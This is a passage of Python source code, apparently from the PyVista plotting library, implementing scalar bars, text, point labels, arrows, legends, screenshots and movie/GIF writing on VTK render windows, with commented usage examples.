width = rcParams['colorbar_horizontal']['width']
if height is None:
if vertical:
height = rcParams['colorbar_vertical']['height']
else:
height = rcParams['colorbar_horizontal']['height']
# check if mapper exists
if mapper is None:
if not hasattr(self, 'mapper') or self.mapper is None:
raise Exception('Mapper does not exist. '
'Add a mesh with scalars first.')
mapper = self.mapper
if title:
# Check that this data hasn't already been plotted
if title in list(self._scalar_bar_ranges.keys()):
clim = list(self._scalar_bar_ranges[title])
newrng = mapper.scalar_range
oldmappers = self._scalar_bar_mappers[title]
# get max for range and reset everything
if newrng[0] < clim[0]:
clim[0] = newrng[0]
if newrng[1] > clim[1]:
clim[1] = newrng[1]
for mh in oldmappers:
mh.scalar_range = clim[0], clim[1]
mapper.scalar_range = clim[0], clim[1]
self._scalar_bar_mappers[title].append(mapper)
self._scalar_bar_ranges[title] = clim
# Color bar already present and ready to be used so returning
return
# Automatically choose location if not specified
if position_x is None or position_y is None:
try:
slot = min(self._scalar_bar_slots)
self._scalar_bar_slots.remove(slot)
self._scalar_bar_slot_lookup[title] = slot
except:
raise RuntimeError('Maximum number of color bars reached.')
if position_x is None:
if vertical:
position_x = rcParams['colorbar_vertical']['position_x']
position_x -= slot * (width + 0.2 * width)
else:
position_x = rcParams['colorbar_horizontal']['position_x']
if position_y is None:
if vertical:
position_y = rcParams['colorbar_vertical']['position_y']
else:
position_y = rcParams['colorbar_horizontal']['position_y']
position_y += slot * height
# Adjust to make sure on the screen
if position_x + width > 1:
position_x -= width
if position_y + height > 1:
position_y -= height
# parse color
color = parse_color(color)
# Create scalar bar
self.scalar_bar = vtk.vtkScalarBarActor()
if background_color is not None:
background_color = parse_color(background_color, opacity=1.0)
background_color = np.array(background_color) * 255
self.scalar_bar.GetBackgroundProperty().SetColor(background_color[0:3])
if fill:
self.scalar_bar.DrawBackgroundOn()
lut = vtk.vtkLookupTable()
lut.DeepCopy(mapper.lookup_table)
ctable = vtk_to_numpy(lut.GetTable())
alphas = ctable[:, -1][:, np.newaxis] / 255.
use_table = ctable.copy()
use_table[:, -1] = 255.
ctable = (use_table * alphas) + background_color * (1 - alphas)
lut.SetTable(numpy_to_vtk(ctable, array_type=vtk.VTK_UNSIGNED_CHAR))
else:
lut = mapper.lookup_table
self.scalar_bar.SetLookupTable(lut)
if n_colors is not None:
self.scalar_bar.SetMaximumNumberOfColors(n_colors)
if n_labels < 1:
self.scalar_bar.DrawTickLabelsOff()
else:
self.scalar_bar.DrawTickLabelsOn()
self.scalar_bar.SetNumberOfLabels(n_labels)
if nan_annotation:
self.scalar_bar.DrawNanAnnotationOn()
if above_label:
self.scalar_bar.DrawAboveRangeSwatchOn()
self.scalar_bar.SetAboveRangeAnnotation(above_label)
if below_label:
self.scalar_bar.DrawBelowRangeSwatchOn()
self.scalar_bar.SetBelowRangeAnnotation(below_label)
# edit the size of the colorbar
self.scalar_bar.SetHeight(height)
self.scalar_bar.SetWidth(width)
self.scalar_bar.SetPosition(position_x, position_y)
if fmt is not None:
self.scalar_bar.SetLabelFormat(fmt)
if vertical:
self.scalar_bar.SetOrientationToVertical()
else:
self.scalar_bar.SetOrientationToHorizontal()
if label_font_size is not None or title_font_size is not None:
self.scalar_bar.UnconstrainedFontSizeOn()
self.scalar_bar.AnnotationTextScalingOn()
label_text = self.scalar_bar.GetLabelTextProperty()
anno_text = self.scalar_bar.GetAnnotationTextProperty()
label_text.SetColor(color)
anno_text.SetColor(color)
label_text.SetShadow(shadow)
anno_text.SetShadow(shadow)
# Set font
label_text.SetFontFamily(parse_font_family(font_family))
anno_text.SetFontFamily(parse_font_family(font_family))
label_text.SetItalic(italic)
anno_text.SetItalic(italic)
label_text.SetBold(bold)
anno_text.SetBold(bold)
if label_font_size:
label_text.SetFontSize(label_font_size)
anno_text.SetFontSize(label_font_size)
# Set properties
if title:
clim = mapper.scalar_range
self._scalar_bar_ranges[title] = clim
self._scalar_bar_mappers[title] = [mapper]
self.scalar_bar.SetTitle(title)
title_text = self.scalar_bar.GetTitleTextProperty()
title_text.SetJustificationToCentered()
title_text.SetItalic(italic)
title_text.SetBold(bold)
title_text.SetShadow(shadow)
if title_font_size:
title_text.SetFontSize(title_font_size)
# Set font
title_text.SetFontFamily(parse_font_family(font_family))
# set color
title_text.SetColor(color)
self._scalar_bar_actors[title] = self.scalar_bar
if interactive is None:
interactive = rcParams['interactive']
if self.shape != (1, 1):
interactive = False
elif interactive and self.shape != (1, 1):
err_str = 'Interactive scalar bars disabled for multi-renderer plots'
raise Exception(err_str)
if interactive and hasattr(self, 'iren'):
self.scalar_widget = vtk.vtkScalarBarWidget()
self.scalar_widget.SetScalarBarActor(self.scalar_bar)
self.scalar_widget.SetInteractor(self.iren)
self.scalar_widget.SetEnabled(1)
rep = self.scalar_widget.GetRepresentation()
# self.scalar_widget.On()
if vertical is True or vertical is None:
rep.SetOrientation(1) # 0 = Horizontal, 1 = Vertical
else:
rep.SetOrientation(0) # 0 = Horizontal, 1 = Vertical
self._scalar_bar_widgets[title] = self.scalar_widget
if use_opacity:
self.scalar_bar.SetUseOpacity(True)
if outline:
self.scalar_bar.SetDrawFrame(True)
frame_prop = self.scalar_bar.GetFrameProperty()
frame_prop.SetColor(color)
else:
self.scalar_bar.SetDrawFrame(False)
self.add_actor(self.scalar_bar, reset_camera=False, pickable=False)
return self.scalar_bar # return the actor
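# A hedged example of adding a customised scalar bar manually (names and
# values are illustrative; ``add_mesh`` is assumed to accept
# ``show_scalar_bar`` so the automatic bar can be suppressed first):
#     >>> import pyvista
#     >>> sphere = pyvista.Sphere()
#     >>> sphere['z'] = sphere.points[:, 2]
#     >>> pl = pyvista.Plotter()
#     >>> _ = pl.add_mesh(sphere, scalars='z', show_scalar_bar=False)
#     >>> _ = pl.add_scalar_bar('Elevation', vertical=True, n_labels=3,
#     ...                       fmt='%.2f', position_x=0.85)
#     >>> pl.show()  # doctest:+SKIP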
def update_scalars(self, scalars, mesh=None, render=True):
"""Update scalars of an object in the plotter.
Parameters
----------
scalars : np.ndarray
Scalars to replace existing scalars.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Forces an update to the render window. Default True.
"""
if mesh is None:
mesh = self.mesh
if isinstance(mesh, (collections.Iterable, pyvista.MultiBlock)):
# Recursive if need to update scalars on many meshes
for m in mesh:
self.update_scalars(scalars, mesh=m, render=False)
if render:
self.render()
return
if isinstance(scalars, str):
# Grab scalars array if name given
scalars = get_array(mesh, scalars)
if scalars is None:
if render:
self.render()
return
if scalars.shape[0] == mesh.GetNumberOfPoints():
data = mesh.GetPointData()
elif scalars.shape[0] == mesh.GetNumberOfCells():
data = mesh.GetCellData()
else:
raise_not_matching(scalars, mesh)
vtk_scalars = data.GetScalars()
if vtk_scalars is None:
raise Exception('No active scalars')
s = convert_array(vtk_scalars)
s[:] = scalars
data.Modified()
try:
# Why are the points updated here? Not all datasets have points
# and only the scalars array is modified by this function...
mesh.GetPoints().Modified()
except:
pass
if render:
self.render()
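# A hedged sketch of updating scalars in place between renders (values are
# arbitrary; keeping the window alive with ``auto_close=False`` is assumed to
# be the intended pattern for repeated updates):
#     >>> import pyvista
#     >>> sphere = pyvista.Sphere()
#     >>> values = sphere.points[:, 2]
#     >>> pl = pyvista.Plotter(off_screen=True)
#     >>> _ = pl.add_mesh(sphere, scalars=values)
#     >>> _ = pl.show(auto_close=False)  # doctest:+SKIP
#     >>> pl.update_scalars(values * 2.0, mesh=sphere)  # doctest:+SKIP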
def update_coordinates(self, points, mesh=None, render=True):
"""Update the points of an object in the plotter.
Parameters
----------
points : np.ndarray
Points to replace existing points.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Forces an update to the render window. Default True.
"""
if mesh is None:
mesh = self.mesh
mesh.points = points
if render:
self.render()
def _clear_ren_win(self):
"""Clear the render window."""
if hasattr(self, 'ren_win'):
self.ren_win.Finalize()
del self.ren_win
def close(self):
"""Close the render window."""
# must close out widgets first
super(BasePlotter, self).close()
# Renderer has an axes widget, so close it
for renderer in self.renderers:
renderer.close()
# Grab screenshots of last render
self.last_image = self.screenshot(None, return_img=True)
self.last_image_depth = self.get_image_depth()
if hasattr(self, 'scalar_widget'):
del self.scalar_widget
# reset scalar bar stuff
self.clear()
self._clear_ren_win()
if hasattr(self, '_style'):
del self._style
if hasattr(self, 'iren'):
# self.iren.RemoveAllObservers()
for obs in self._observers.values():
self.iren.RemoveObservers(obs)
del self._observers
self.iren.TerminateApp()
del self.iren
if hasattr(self, 'textActor'):
del self.textActor
# end movie
if hasattr(self, 'mwriter'):
try:
self.mwriter.close()
except BaseException:
pass
# this helps managing closed plotters
self._closed = True
def deep_clean(self):
"""Clean the plotter of the memory."""
for renderer in self.renderers:
renderer.deep_clean()
for renderer in self._background_renderers:
if renderer is not None:
renderer.deep_clean()
# Do not remove the renderers on the clean
self.mesh = None
self.mapper = None
def add_text(self, text, position='upper_left', font_size=18, color=None,
font=None, shadow=False, name=None, viewport=False):
"""Add text to plot object in the top left corner by default.
Parameters
----------
text : str
The text to add the rendering
position : str, tuple(float)
Position to place the bottom left corner of the text box.
If tuple is used, the position of the text uses the pixel
coordinate system (default). In this case,
it returns a more general `vtkOpenGLTextActor`.
If string name is used, it returns a `vtkCornerAnnotation`
object normally used for fixed labels (like title or xlabel).
Default is to find the top left corner of the rendering window
and place text box up there. Available position: ``'lower_left'``,
``'lower_right'``, ``'upper_left'``, ``'upper_right'``,
``'lower_edge'``, ``'upper_edge'``, ``'right_edge'``, and
``'left_edge'``
font : string, optional
Font name may be courier, times, or arial
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
viewport: bool
If True and position is a tuple of float, uses
the normalized viewport coordinate system (values between 0.0
and 1.0 and support for HiDPI).
Return
------
textActor : vtk.vtkTextActor
Text actor added to plot
"""
if font is None:
font = rcParams['font']['family']
if font_size is None:
font_size = rcParams['font']['size']
if color is None:
color = rcParams['font']['color']
if position is None:
# Set the position of the text to the top left corner
window_size = self.window_size
x = (window_size[0] * 0.02) / self.shape[0]
y = (window_size[1] * 0.85) / self.shape[0]
position = [x, y]
corner_mappings = {
'lower_left': vtk.vtkCornerAnnotation.LowerLeft,
'lower_right': vtk.vtkCornerAnnotation.LowerRight,
'upper_left': vtk.vtkCornerAnnotation.UpperLeft,
'upper_right': vtk.vtkCornerAnnotation.UpperRight,
'lower_edge': vtk.vtkCornerAnnotation.LowerEdge,
'upper_edge': vtk.vtkCornerAnnotation.UpperEdge,
'left_edge': vtk.vtkCornerAnnotation.LeftEdge,
'right_edge': vtk.vtkCornerAnnotation.RightEdge,
}
corner_mappings['ll'] = corner_mappings['lower_left']
corner_mappings['lr'] = corner_mappings['lower_right']
corner_mappings['ul'] = corner_mappings['upper_left']
corner_mappings['ur'] = corner_mappings['upper_right']
corner_mappings['top'] = corner_mappings['upper_edge']
corner_mappings['bottom'] = corner_mappings['lower_edge']
corner_mappings['right'] = corner_mappings['right_edge']
corner_mappings['r'] = corner_mappings['right_edge']
corner_mappings['left'] = corner_mappings['left_edge']
corner_mappings['l'] = corner_mappings['left_edge']
if isinstance(position, (int, str, bool)):
if isinstance(position, str):
position = corner_mappings[position]
elif position is True:
position = corner_mappings['upper_left']
self.textActor = vtk.vtkCornerAnnotation()
# This is how you set the font size with this actor
self.textActor.SetLinearFontScaleFactor(font_size // 2)
self.textActor.SetText(position, text)
else:
self.textActor = vtk.vtkTextActor()
self.textActor.SetInput(text)
self.textActor.SetPosition(position)
if viewport:
self.textActor.GetActualPositionCoordinate().SetCoordinateSystemToNormalizedViewport()
self.textActor.GetActualPosition2Coordinate().SetCoordinateSystemToNormalizedViewport()
self.textActor.GetTextProperty().SetFontSize(int(font_size * 2))
self.textActor.GetTextProperty().SetColor(parse_color(color))
self.textActor.GetTextProperty().SetFontFamily(FONT_KEYS[font])
self.textActor.GetTextProperty().SetShadow(shadow)
self.add_actor(self.textActor, reset_camera=False, name=name, pickable=False)
return self.textActor
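# A minimal sketch of ``add_text`` using a named corner position (a tuple of
# pixel coordinates would work as well, per the docstring above):
#     >>> import pyvista
#     >>> pl = pyvista.Plotter()
#     >>> _ = pl.add_mesh(pyvista.Sphere())
#     >>> _ = pl.add_text('Sample Title', position='upper_edge',
#     ...                 font_size=18, color='black')
#     >>> pl.show()  # doctest:+SKIP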
def open_movie(self, filename, framerate=24):
"""Establish a connection to the ffmpeg writer.
Parameters
----------
filename : str
Filename of the movie to open. Filename should end in mp4,
but other filetypes may be supported. See ``imageio.get_writer``.
framerate : int, optional
Frames per second.
"""
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self.mwriter = imageio.get_writer(filename, fps=framerate)
def open_gif(self, filename):
"""Open a gif file.
Parameters
----------
filename : str
Filename of the gif to open. Filename must end in gif.
"""
if filename[-3:] != 'gif':
raise Exception('Unsupported filetype. Must end in .gif')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self._gif_filename = os.path.abspath(filename)
self.mwriter = imageio.get_writer(filename, mode='I')
def write_frame(self):
"""Write a single frame to the movie file."""
if not hasattr(self, 'mwriter'):
raise AssertionError('This plotter has not opened a movie or GIF file.')
self.mwriter.append_data(self.image)
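# A hedged sketch of writing a GIF frame-by-frame (filenames and angles are
# arbitrary; keeping the window alive with ``show(auto_close=False)`` before
# writing frames is an assumed pattern, and ``Azimuth`` comes from ``vtkCamera``):
#     >>> import pyvista
#     >>> pl = pyvista.Plotter(off_screen=True)
#     >>> _ = pl.add_mesh(pyvista.Sphere())
#     >>> _ = pl.show(auto_close=False)  # doctest:+SKIP
#     >>> pl.open_gif('animation.gif')  # doctest:+SKIP
#     >>> for _ in range(36):  # doctest:+SKIP
#     ...     pl.camera.Azimuth(10)
#     ...     pl.render()
#     ...     pl.write_frame()
#     >>> pl.close()  # doctest:+SKIP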
def _run_image_filter(self, ifilter):
# Update filter and grab pixels
ifilter.Modified()
ifilter.Update()
image = pyvista.wrap(ifilter.GetOutput())
img_size = image.dimensions
img_array = pyvista.utilities.point_array(image, 'ImageScalars')
# Reshape and write
tgt_size = (img_size[1], img_size[0], -1)
return img_array.reshape(tgt_size)[::-1]
def get_image_depth(self,
fill_value=np.nan,
reset_camera_clipping_range=True):
"""Return a depth image representing current render window.
Parameters
----------
fill_value : float
Fill value for points in image that don't include objects in scene.
To not use a fill value, pass ``None``.
reset_camera_clipping_range : bool
Reset the camera clipping range to include data in view?
Return
------
image_depth : numpy.ndarray
Image of depth values from camera orthogonal to image plane
Notes
-----
Values in image_depth are negative to adhere to a
right-handed coordinate system.
"""
if not hasattr(self, 'ren_win') and hasattr(self, 'last_image_depth'):
zval = self.last_image_depth.copy()
if fill_value is not None:
zval[self._image_depth_null] = fill_value
return zval
# Ensure points in view are within clipping range of renderer?
if reset_camera_clipping_range:
self.renderer.ResetCameraClippingRange()
# Get the z-buffer image
ifilter = vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
ifilter.SetInputBufferTypeToZBuffer()
zbuff = self._run_image_filter(ifilter)[:, :, 0]
# Convert z-buffer values to depth from camera
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
near, far = self.camera.GetClippingRange()
if self.camera.GetParallelProjection():
zval = (zbuff - near) / (far - near)
else:
zval = 2 * near * far / ((zbuff - 0.5) * 2 * (far - near) - near - far)
# Consider image values outside clipping range as nans
args = np.logical_or(zval < -far, np.isclose(zval, -far))
self._image_depth_null = args
if fill_value is not None:
zval[args] = fill_value
return zval
def add_lines(self, lines, color=(1, 1, 1), width=5, label=None, name=None):
"""Add lines to the plotting object.
Parameters
----------
lines : np.ndarray or pyvista.PolyData
Points representing line segments. For example, two line segments
would be represented as:
np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
width : float, optional
Thickness of lines
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Return
------
actor : vtk.vtkActor
Lines actor.
"""
if not isinstance(lines, np.ndarray):
raise Exception('Input should be an array of point segments')
lines = pyvista.lines_from_points(lines)
# Create mapper and add lines
mapper = vtk.vtkDataSetMapper()
mapper.SetInputData(lines)
rgb_color = parse_color(color)
# legend label
if label:
if not isinstance(label, str):
raise AssertionError('Label must be a string')
self._labels.append([lines, label, rgb_color])
# Create actor
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetLineWidth(width)
actor.GetProperty().EdgeVisibilityOn()
actor.GetProperty().SetEdgeColor(rgb_color)
actor.GetProperty().SetColor(rgb_color)
actor.GetProperty().LightingOff()
# Add to renderer
self.add_actor(actor, reset_camera=False, name=name, pickable=False)
return actor
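# A short usage sketch mirroring the docstring's example segments:
#     >>> import numpy as np
#     >>> import pyvista
#     >>> pts = np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]], dtype=float)
#     >>> pl = pyvista.Plotter()
#     >>> actor = pl.add_lines(pts, color='yellow', width=3)
#     >>> pl.show()  # doctest:+SKIP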
def remove_scalar_bar(self):
"""Remove the scalar bar."""
if hasattr(self, 'scalar_bar'):
self.remove_actor(self.scalar_bar, reset_camera=False)
def add_point_labels(self, points, labels, italic=False, bold=True,
font_size=None, text_color=None,
font_family=None, shadow=False,
show_points=True, point_color=None, point_size=5,
name=None, shape_color='grey', shape='rounded_rect',
fill_shape=True, margin=3, shape_opacity=1.0,
pickable=False, render_points_as_spheres=False,
tolerance=0.001):
"""Create a point actor with one label from list labels assigned to each point.
Parameters
----------
points : np.ndarray or pyvista.Common
n x 3 numpy array of points or pyvista dataset with points
labels : list or str
List of labels. Must be the same length as points. If a string name
is given with a pyvista.Common input for points, then these are fetched.
italic : bool, optional
Italicises title and bar labels. Default False.
bold : bool, optional
Bolds title and bar labels. Default True
font_size : float, optional
Sets the size of the label font. Defaults to 16.
text_color : string or 3 item list, optional
Color of text. Either a string, rgb list, or hex color string.
text_color='white'
text_color='w'
text_color=[1, 1, 1]
text_color='#FFFFFF'
font_family : string, optional
Font family. Must be either courier, times, or arial.
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
show_points : bool, optional
Controls if points are visible. Default True
point_color : string or 3 item list, optional
Color of points (if visible). Either a string, rgb list, or hex color
string. For example:
point_color='white'
point_color='w'
point_color=[1, 1, 1]
point_color='#FFFFFF'
point_size : float, optional
Size of points (if visible)
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
shape_color : string or 3 item list, optional
Color of the label background shape. Either a string, rgb list, or hex
color string. Defaults to ``'grey'``.
shape : str, optional
The string name of the shape to use. Options are ``'rect'`` or
``'rounded_rect'``. If you want no shape, pass ``None``
fill_shape : bool, optional
Fill the shape with the ``shape_color``. Outlines if ``False``.
margin : int, optional
The size of the margin on the label background shape. Default is 3.
shape_opacity : float
The opacity of the shape between zero and one.
tolerance : float
a tolerance to use to determine whether a point label is visible.
A tolerance is usually required because the conversion from world
space to display space during rendering introduces numerical
round-off.
Return
------
labelActor : vtk.vtkActor2D
VTK label actor. Can be used to change properties of the labels.
"""
if font_family is None:
font_family = rcParams['font']['family']
if font_size is None:
font_size = rcParams['font']['size']
if point_color is None:
point_color = rcParams['color']
if text_color is None:
text_color = rcParams['font']['color']
if isinstance(points, (list, tuple)):
points = np.array(points)
if isinstance(points, np.ndarray):
vtkpoints = pyvista.PolyData(points) # Cast to poly data
elif is_pyvista_dataset(points):
vtkpoints = pyvista.PolyData(points.points)
if isinstance(labels, str):
labels = points.point_arrays[labels].astype(str)
else:
raise TypeError('Points type not usable: {}'.format(type(points)))
if len(vtkpoints.points) != len(labels):
raise Exception('There must be one label for each point')
if name is None:
name = '{}({})'.format(type(vtkpoints).__name__, vtkpoints.memory_address)
vtklabels = vtk.vtkStringArray()
vtklabels.SetName('labels')
for item in labels:
vtklabels.InsertNextValue(str(item))
vtkpoints.GetPointData().AddArray(vtklabels)
# Only show visible points
vis_points = vtk.vtkSelectVisiblePoints()
vis_points.SetInputData(vtkpoints)
vis_points.SetRenderer(self.renderer)
vis_points.SetTolerance(tolerance)
# Create hierarchy
hier = vtk.vtkPointSetToLabelHierarchy()
hier.SetInputConnection(vis_points.GetOutputPort())
hier.SetLabelArrayName('labels')
# create label mapper
labelMapper = vtk.vtkLabelPlacementMapper()
labelMapper.SetInputConnection(hier.GetOutputPort())
if not isinstance(shape, str):
labelMapper.SetShapeToNone()
elif shape.lower() == 'rect':
labelMapper.SetShapeToRect()
elif shape.lower() == 'rounded_rect':
labelMapper.SetShapeToRoundedRect()
else:
raise RuntimeError('Shape ({}) not understood'.format(shape))
if fill_shape:
labelMapper.SetStyleToFilled()
else:
labelMapper.SetStyleToOutline()
labelMapper.SetBackgroundColor(parse_color(shape_color))
labelMapper.SetBackgroundOpacity(shape_opacity)
labelMapper.SetMargin(margin)
textprop = hier.GetTextProperty()
textprop.SetItalic(italic)
textprop.SetBold(bold)
textprop.SetFontSize(font_size)
textprop.SetFontFamily(parse_font_family(font_family))
textprop.SetColor(parse_color(text_color))
textprop.SetShadow(shadow)
self.remove_actor('{}-points'.format(name), reset_camera=False)
self.remove_actor('{}-labels'.format(name), reset_camera=False)
# add points
if show_points:
style = 'points'
else:
style = 'surface'
self.add_mesh(vtkpoints, style=style, color=point_color,
point_size=point_size, name='{}-points'.format(name),
pickable=pickable,
render_points_as_spheres=render_points_as_spheres)
labelActor = vtk.vtkActor2D()
labelActor.SetMapper(labelMapper)
self.add_actor(labelActor, reset_camera=False,
name='{}-labels'.format(name), pickable=False)
return labelActor
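# A hedged sketch of labelling a handful of points (coordinates and labels are
# arbitrary):
#     >>> import numpy as np
#     >>> import pyvista
#     >>> points = np.array([[0.0, 0.0, 0.0], [1.0, 1.0, 0.0], [2.0, 0.0, 0.0]])
#     >>> labels = ['A', 'B', 'C']
#     >>> pl = pyvista.Plotter()
#     >>> actor = pl.add_point_labels(points, labels, font_size=24,
#     ...                             point_color='red', point_size=10)
#     >>> pl.show()  # doctest:+SKIP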
def add_point_scalar_labels(self, points, labels, fmt=None, preamble='', **kwargs):
"""Label the points from a dataset with the values of their scalars.
Wrapper for :func:`pyvista.BasePlotter.add_point_labels`.
Parameters
----------
points : np.ndarray or pyvista.Common
n x 3 numpy array of points or pyvista dataset with points
labels : str
String name of the point data array to use.
fmt : str
String formatter used to format numerical data. Defaults to
``rcParams['font']['fmt']``.
preamble : str, optional
Text placed before each formatted scalar value.
"""
if not is_pyvista_dataset(points):
raise TypeError('input points must be a pyvista dataset, not: {}'.format(type(points)))
if not isinstance(labels, str):
raise TypeError('labels must be a string name of the scalars array to use')
if fmt is None:
fmt = rcParams['font']['fmt']
if fmt is None:
fmt = '%.6e'
scalars = points.point_arrays[labels]
phrase = '{} {}'.format(preamble, fmt)
labels = [phrase % val for val in scalars]
return self.add_point_labels(points, labels, **kwargs)
def add_points(self, points, **kwargs):
"""Add points to a mesh."""
kwargs['style'] = 'points'
return self.add_mesh(points, **kwargs)
def add_arrows(self, cent, direction, mag=1, **kwargs):
"""Add arrows to plotting object."""
direction = direction.copy()
if cent.ndim != 2:
cent = cent.reshape((-1, 3))
if direction.ndim != 2:
direction = direction.reshape((-1, 3))
direction[:,0] *= mag
direction[:,1] *= mag
direction[:,2] *= mag
pdata = pyvista.vector_poly_data(cent, direction)
# Create arrow object
arrow = vtk.vtkArrowSource()
arrow.Update()
glyph3D = vtk.vtkGlyph3D()
glyph3D.SetSourceData(arrow.GetOutput())
glyph3D.SetInputData(pdata)
glyph3D.SetVectorModeToUseVector()
glyph3D.Update()
arrows = wrap(glyph3D.GetOutput())
return self.add_mesh(arrows, **kwargs)
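# A minimal sketch for ``add_arrows`` (random centres and directions; ``mag``
# simply scales the direction vectors, as the code above shows):
#     >>> import numpy as np
#     >>> import pyvista
#     >>> cent = np.random.random((10, 3))
#     >>> direction = np.random.random((10, 3))
#     >>> pl = pyvista.Plotter()
#     >>> _ = pl.add_arrows(cent, direction, mag=0.5)
#     >>> pl.show()  # doctest:+SKIP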
@staticmethod
def _save_image(image, filename, return_img=None):
"""Save a NumPy image array.
This is an internal helper.
"""
if not image.size:
raise Exception('Empty image. Have you run plot() first?')
# write screenshot to file
supported_formats = [".png", ".jpeg", ".jpg", ".bmp", ".tif", ".tiff"]
if isinstance(filename, str):
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
if not any([filename.lower().endswith(ext) for ext in supported_formats]):
filename += ".png"
filename = os.path.abspath(os.path.expanduser(filename))
w = imageio.imwrite(filename, image)
if not return_img:
return w
return image
def save_graphic(self, filename, title='PyVista Export', raster=True, painter=True):
"""Save a screenshot of the rendering window as a graphic file.
The supported formats are: '.svg', '.eps', '.ps', '.pdf', '.tex'
"""
if not hasattr(self, 'ren_win'):
raise AttributeError('This plotter is closed and unable to save a screenshot.')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
filename = os.path.abspath(os.path.expanduser(filename))
extension = pyvista.fileio.get_ext(filename)
valid = ['.svg', '.eps', '.ps', '.pdf', '.tex']
if extension not in valid:
raise RuntimeError('Extension ({}) is an invalid choice. Valid options include: {}'.format(extension, ', '.join(valid)))
writer = vtk.vtkGL2PSExporter()
modes = {
'.svg': writer.SetFileFormatToSVG,
'.eps': writer.SetFileFormatToEPS,
'.ps': writer.SetFileFormatToPS,
'.pdf': writer.SetFileFormatToPDF,
'.tex': writer.SetFileFormatToTeX,
}
writer.CompressOff()
writer.SetFilePrefix(filename.replace(extension, ''))
writer.SetInput(self.ren_win)
modes[extension]()
writer.SetTitle(title)
writer.SetWrite3DPropsAsRasterImage(raster)
if painter:
writer.UsePainterSettings()
writer.Update()
return
def screenshot(self, filename=None, transparent_background=None,
return_img=None, window_size=None):
"""Take screenshot at current camera position.
Parameters
----------
filename : str, optional
Location to write image to. If None, no image is written.
transparent_background : bool, optional
Makes the background transparent. Default False.
return_img : bool, optional
If a string filename is given and this is true, a NumPy array of
the image will be returned.
Return
------
img : numpy.ndarray
Array containing pixel RGB and alpha. Sized:
[Window height x Window width x 3] for transparent_background=False
[Window height x Window width x 4] for transparent_background=True
Examples
--------
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(sphere)
>>> plotter.screenshot('screenshot.png') # doctest:+SKIP
"""
if window_size is not None:
self.window_size = window_size
# configure image filter
if transparent_background is None:
transparent_background = rcParams['transparent_background']
self.image_transparent_background = transparent_background
# This if statement allows you to save screenshots of closed plotters
# This is needed for the sphinx-gallery work
if not hasattr(self, 'ren_win'):
# If plotter has been closed...
# check if last_image exists
if hasattr(self, 'last_image'):
# Save last image
return self._save_image(self.last_image, filename, return_img)
# Plotter hasn't been rendered or was improperly closed
raise AttributeError('This plotter is closed and unable to save a screenshot.')
self.render()
# debug: this needs to be called twice for some reason,
img = self.image
img = self.image
return self._save_image(img, filename, return_img)
def add_legend(self, labels=None, bcolor=(0.5, 0.5, 0.5), border=False,
size=None, name=None):
"""Add a legend to render window.
Entries must be a list containing one string and color entry for each
item.
Parameters
----------
labels : list, optional
When set to None, uses existing labels as specified by
- add_mesh
- add_lines
- add_points
List containing one entry for each item to be added to the
legend. Each entry must contain two strings, [label,
color], where label is the name of the item to add, and
color is the color of the label to add.
bcolor : list or string, optional
Background color, either a three item 0 to 1 RGB color
list, or a matplotlib color string (e.g. 'w' or 'white'
for a white color). If None, legend background is
disabled.
border : bool, optional
Controls if there will be a border around the legend.
Default False.
size : list, optional
Two float list, each float between 0 and 1. For example
[0.1, 0.1] would make the legend 10% the size of the
entire figure window.
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Return
------
legend : vtk.vtkLegendBoxActor
Actor for the legend.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> othermesh = examples.load_uniform()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, label='My Mesh')
>>> _ = plotter.add_mesh(othermesh, 'k', label='My Other Mesh')
>>> _ = plotter.add_legend()
>>> plotter.show() # doctest:+SKIP
Alternative manual example
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> othermesh = examples.load_uniform()
>>> legend_entries = []
>>> legend_entries.append(['My Mesh', 'w'])
>>> legend_entries.append(['My Other Mesh', 'k'])
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh)
>>> _ = plotter.add_mesh(othermesh, 'k')
>>> _ = plotter.add_legend(legend_entries)
>>> plotter.show() # doctest:+SKIP
"""
self.legend = vtk.vtkLegendBoxActor()
if labels is None:
# use existing labels
if not self._labels:
raise Exception('No labels input.\n\n'
'Add labels to individual items when adding them to'
'the plotting object with the "label=" parameter. '
'or enter them as the "labels" parameter.')
self.legend.SetNumberOfEntries(len(self._labels))
for i, (vtk_object, text, color) in enumerate(self._labels):
self.legend.SetEntry(i, vtk_object, text, parse_color(color))
else:
self.legend.SetNumberOfEntries(len(labels))
legendface = pyvista.single_triangle()
for i, (text, color) in enumerate(labels):
self.legend.SetEntry(i, legendface, text, parse_color(color))
if size:
